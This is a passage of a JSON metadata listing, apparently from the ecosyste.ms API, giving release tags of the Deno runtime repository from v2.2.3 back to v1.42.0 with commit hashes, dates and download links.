2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/